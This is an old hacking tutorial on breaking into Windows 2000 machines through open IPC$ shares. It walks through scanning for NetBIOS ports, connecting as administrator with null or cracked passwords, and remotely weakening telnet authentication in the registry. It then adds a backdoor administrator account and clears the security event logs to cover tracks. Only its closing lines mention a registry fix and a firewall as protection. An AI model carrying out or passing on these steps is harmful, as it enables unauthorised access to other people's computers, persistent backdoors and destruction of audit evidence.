hacking win2k through ipc$

What you need :

+++++++++++++++
1. A port scanner like Superscan v3.0.
2. NetBrute scanner.
3. PQWak v1.0 share name password cracker.
__________________________________________________
___________________________
->1. Download Superscan from Astalavista ( www.astalavista.com/hacking/win/super
scan.exe ).
->2. Get Netbrute scanner from ( www.astalavista.com/hacking/win/nbrute10.zip ).
->3. Do the same with PQWak v1.0 ( www.astalavista.com/hacking/win/PQwak.exe ).
__________________________________________________
___________________________
->Lets begin
1.Open SuperScan and select an ip range. Check "Only scan responsive pings" and
"All selected ports in list".
Then, scan only Netbios(139) and Network Blackjack(1025).
When both Netbios and Blackjack is found open Netbrute and scan that ip to see
if there is an IPC$.
2.After you found that there is an IPC$ on the remote system open the command pr
ompt
and type in:
C:\>net use \\ipaddress\ipc$ " /user:administrator "
When you connect to the system, it will print:
C:\>net use \\ipaddress\ipc$ " /user:administrator "
The command was completed successfully.
If it says "bad username or password" try running PQWAK.exe to crack the share n
ame
password. Then insert the password like so:
C:\>net use \\ipaddress\ipc$ "password" /user:administrator
Try the c$ share pass as the administrator password to connect to the IPC$.
3.As you are connected, open Computer Management. Click "Action", then "Connect
to Another Computer"
and type in the ip address.
4.Then, go to the command prompt ( Start>Run.. ) and open "regedit". Connect to
the following
registry key "HKEY_LOCAL_MACHINE--Software--Microsoft--Telnet Server--1.0->NTLM"
.
Set the value data from (2) to (1).
That will enable login to the telnet server without being connected to the IPC$
or a trusted domain.
5.Go back to Computer Management and click "Services and Applications" and then
"Services".
Right click on the Telnet Service and open properties. Set the service to automa
tic and
start the service.
6.Go to the command prompt ( Start>Run.. ) and write :
telnet < ipaddress >
If it asks you to type a username and password, type Administrator with no passw
ord.
You might want to create a user account. If you want, type in the command prompt
:
C:\>net user username password/add
To add a user account to a domain, write :
C:\>net group administrators username /add
7.The last thing is to cover your tracks.
To do this write in the command prompt :
C:\>net use \\ipaddress\ipc$ /delete
Then as you are connected go to Computer Management and check if the security lo
gs are
being audited in "Event Viewer".If there are, clear them.
A solution to protect your W2k system from this attack is to connect to the foll
owing registry key :
"HKEY_LOCAL_MACHINE--System--CurrentControlSet--Control--Lsa-->restrictanonymous
", and change the
the value data from (0) to (1).
Doing this, will disable remote logon to a null IPC$.
You can also install a firewall ( www.zonealarm.com ).